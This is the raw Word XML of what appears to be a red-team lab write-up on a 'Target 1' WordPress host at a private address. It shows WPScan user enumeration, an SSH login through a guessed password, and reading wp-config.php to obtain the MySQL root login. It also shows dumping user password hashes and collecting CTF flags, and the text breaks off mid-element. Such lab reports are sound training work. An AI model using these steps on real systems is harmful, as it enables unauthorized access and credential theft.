        <w:t>[upguard.com]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB5401" w:rsidRDefault="00EB5401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  <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“A</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n open port can become a security risk when the service listening to the port is misconfigured, unpatched, vulnerable to exploits, or has poor network security rules. The most dangerous open ports are </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wormable ports</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, like the one that the SMB protocol uses, which are open by default in some operating systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="70757A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>”</w:t>
      </w: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757A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE1107" w:rsidRPr="00314519" w:rsidRDefault="00EE1107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02124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00314519">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kali Scan to Detect Vulnerable </w:t>
      </w:r>
      <w:r w:rsidR="00E24976" w:rsidRPr="00314519">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WordPress</w:t>
      </w:r>
      <w:r w:rsidRPr="00314519">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> App</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE1107" w:rsidRDefault="00EE1107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</w:p>
    <w:p w:rsidR="00314519" w:rsidRDefault="00314519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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00E24976">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WPs</w:t>
      </w:r>
      <w:r w:rsidRPr="00314519">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>can is an open </w:t>
      </w:r>
      <w:r w:rsidRPr="00314519">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>source WordPress security scanner</w:t>
      </w:r>
      <w:r w:rsidRPr="00314519">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. You can use it to scan your WordPress website for known vulnerabilities within the WordPress core, as well as popular WordPress plugins and themes. Since it is a WordPress black box scanner, it mimics a real attacker.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="00314519">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[wpwhitesecurity.com]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB5401" w:rsidRPr="00EB5401" w:rsidRDefault="00EB5401" w:rsidP="00EB540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0DAB"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.upguard.com/blog/smb-port" \l ":~:text=However%2C%20an%20open%20port%20can,default%20in%20some%20operating%20systems." </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00EB5401">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00EE1107">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="3091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-wpscan-idusers-target1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01" w:rsidRDefault="00EB5401" w:rsidP="00314519">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB5401">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00314519">
        <w:t xml:space="preserve">3.  </w:t>
      </w:r>
      <w:r w:rsidR="00EE1107">
        <w:rPr>
          <w:rStyle w:val="nv"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="00EE1107">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan –-url http://192.168.1.110/wordpress </w:t>
      </w:r>
      <w:r w:rsidR="00EE1107">
        <w:rPr>
          <w:rStyle w:val="nt"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-eu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE1107" w:rsidRDefault="00EE1107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</w:p>
    <w:p w:rsidR="00EE1107" w:rsidRPr="00EB5401" w:rsidRDefault="00EE1107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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="202124"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="3094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-wpscan-idusers-target1b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01" w:rsidRPr="00210D28" w:rsidRDefault="00EE1107" w:rsidP="00314519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Style w:val="nv"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00210D28">
        <w:rPr>
          <w:rStyle w:val="nv"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Revealed by Author ID Brute Forcing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB5401" w:rsidRPr="00EB5401" w:rsidRDefault="00EB5401" w:rsidP="00EB54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</w:p>
    <w:p w:rsidR="00EB5401" w:rsidRPr="00EB5401" w:rsidRDefault="00EB5401" w:rsidP="003E7F25">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1A0DAB"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544"/>
    <w:p w:rsidR="00126544" w:rsidRPr="00EE1107" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1107">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544"/>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:r>
        <w:t>The Red Team was able to penetrate `Target 1` and retrieve the following confidential data:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:r>
        <w:t>- Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - `flag1.txt`: </w:t>
      </w:r>
      <w:r w:rsidR="006938B2">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> b9bbcb33e11b80be759c4e844862482d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006938B2" w:rsidRDefault="006938B2" w:rsidP="00126544">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="31019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-ssh-target1-flag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D28" w:rsidRDefault="00EE1107" w:rsidP="00314519">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00314519">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">michael@target1:/var/www$ grep -RE flag html </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE1107" w:rsidRPr="00314519" w:rsidRDefault="00EE1107" w:rsidP="00210D28">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1260"/>
        <w:rPr>
          <w:rStyle w:val="o"/>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00210D28">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(Search all html files in root directory to expose text ‘flag’ in any file.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72ABB" w:rsidRDefault="00C72ABB" w:rsidP="00126544"/>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:r>
        <w:t xml:space="preserve">    - **Exploit Used**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F626D5" w:rsidRPr="00F626D5" w:rsidRDefault="00F626D5" w:rsidP="00126544">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F626D5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Simple Brute Force Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="006938B2">
        <w:t>SSH shell used to gain access with user login michael: (password guessing -&gt; michael)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A674F1" w:rsidRPr="00A674F1" w:rsidRDefault="00A674F1" w:rsidP="00A674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674F1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ ssh michael@192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A674F1" w:rsidRDefault="00A674F1" w:rsidP="00126544"/>
    <w:p w:rsidR="00F626D5" w:rsidRDefault="00F626D5" w:rsidP="00126544"/>
    <w:p w:rsidR="00F626D5" w:rsidRDefault="00F626D5" w:rsidP="00126544"/>
    <w:p w:rsidR="00F626D5" w:rsidRDefault="00F626D5" w:rsidP="00126544"/>
    <w:p w:rsidR="00126544" w:rsidRDefault="00126544" w:rsidP="00126544">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - `flag2.txt`: </w:t>
      </w:r>
      <w:r w:rsidR="00A674F1" w:rsidRPr="00A674F1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fc3fd58dcdad9ab23faca6e9a36e581c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00510FDA" w:rsidRDefault="007E2BD1" w:rsidP="00A674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1603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-ssh-target1-flag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DA" w:rsidRDefault="00510FDA" w:rsidP="00A674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E2BD1" w:rsidRPr="007E2BD1" w:rsidRDefault="007E2BD1" w:rsidP="007E2BD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E2BD1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Used - </w:t>
      </w:r>
      <w:r w:rsidRPr="007E2BD1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Directory Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F626D5" w:rsidRDefault="00F626D5" w:rsidP="00F626D5">
      <w:r>
        <w:t xml:space="preserve">     Moved to target root directory once SSH shell </w:t>
      </w:r>
      <w:r w:rsidR="007E2BD1">
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r>
        <w:t>achieved with user michael.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F626D5" w:rsidRPr="00A674F1" w:rsidRDefault="00F626D5" w:rsidP="00F62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674F1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>michael@target1:~$ cd /var/www</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F626D5" w:rsidRPr="00A674F1" w:rsidRDefault="00F626D5" w:rsidP="00F62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674F1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>michael@target1:/var/www$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F626D5" w:rsidRPr="00A674F1" w:rsidRDefault="00F626D5" w:rsidP="00F62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674F1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>flag2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F626D5" w:rsidRDefault="00F626D5" w:rsidP="00F62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674F1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>michael@target1:/var/www$ cat flag2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB20FC" w:rsidRDefault="00CB20FC" w:rsidP="00F62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E2BD1" w:rsidRDefault="007E2BD1" w:rsidP="00F62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E2BD1" w:rsidRDefault="007E2BD1" w:rsidP="00F62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E2BD1" w:rsidRDefault="007E2BD1" w:rsidP="00F62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 wp14:anchorId="6AC27EAA" wp14:editId="428226A2">
            <wp:extent cx="5943600" cy="3106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-mysql-dbpass-target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9B" w:rsidRDefault="001E709B" w:rsidP="00F62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1E709B" w:rsidRPr="001E709B" w:rsidRDefault="001E709B" w:rsidP="00CB20FC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  <w:r w:rsidRPr="001E709B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Viewing the WordPress config file yields the DB root login.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D85E3F" w:rsidRDefault="00CB20FC" w:rsidP="001E709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60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB20FC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>michael@target1:~$ cat /var/www/html/wordpress/wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12617" w:rsidRDefault="00A12617" w:rsidP="001E709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60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A12617" w:rsidRDefault="00A12617" w:rsidP="001E709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60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A12617" w:rsidRDefault="00A12617" w:rsidP="001E709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60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A12617" w:rsidRDefault="00A12617" w:rsidP="001E709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60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A12617" w:rsidRDefault="00A12617" w:rsidP="001E709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60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A12617" w:rsidRDefault="00A12617" w:rsidP="001E709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60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A12617" w:rsidRDefault="00A12617" w:rsidP="001E709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60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A12617" w:rsidRPr="00D85E3F" w:rsidRDefault="00A12617" w:rsidP="001E709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60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F626D5" w:rsidRDefault="00F626D5" w:rsidP="00A674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F626D5" w:rsidRPr="00A674F1" w:rsidRDefault="00F626D5" w:rsidP="00A674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674F1" w:rsidRDefault="00A674F1" w:rsidP="00A674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674F1" w:rsidRDefault="00A674F1" w:rsidP="00A674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10FDA" w:rsidRDefault="00510FDA" w:rsidP="00A674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943600" cy="31013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-mysql-wordpress-target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DA" w:rsidRDefault="00510FDA" w:rsidP="00A674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10FDA" w:rsidRPr="00A674F1" w:rsidRDefault="00510FDA" w:rsidP="00A674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A1F73" w:rsidRPr="00FF6408" w:rsidRDefault="00FF6408" w:rsidP="00FF6408">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6408">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Credentials gained allows root access to MYSQL database. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12617" w:rsidRDefault="00A12617" w:rsidP="00A12617">
      <w:r>
        <w:t>michael@target1:~$ mysql -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12617" w:rsidRDefault="00A12617" w:rsidP="00A12617">
      <w:r>
        <w:t>mysql&gt; use wordpress;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A12617" w:rsidRDefault="00A12617" w:rsidP="00A12617">
      <w:r>
        <w:t>mysql&gt; show tables;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00510FDA" w:rsidRDefault="00510FDA" w:rsidP="00A674F1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00510FDA" w:rsidRDefault="00510FDA" w:rsidP="00A674F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="3086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-mysql-passwdhash-target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DA" w:rsidRDefault="00D85E3F" w:rsidP="00510FDA">
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00C72ABB">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A12617">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF6408">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF6408" w:rsidRPr="00FF6408">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Usernames and password hashes revealed:</w:t>
      </w:r>
      <w:r w:rsidR="00FF6408">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00A12617" w:rsidRPr="00A12617">
        <w:t>mysql&gt; select * from users;</w:t>
      </w:r>
      <w:r w:rsidR="00FF6408">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00510FDA" w:rsidRDefault="00510FDA" w:rsidP="00510FDA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="3131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-mysql-blog-flag3-target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08" w:rsidRPr="00FF6408" w:rsidRDefault="00D85E3F" w:rsidP="00510FDA">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00C72ABB">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00FF6408">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF6408" w:rsidRPr="00FF6408">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Unrestricted access to the database yields another flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00510FDA" w:rsidRDefault="00FF6408" w:rsidP="00510FDA">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="n"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="o"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
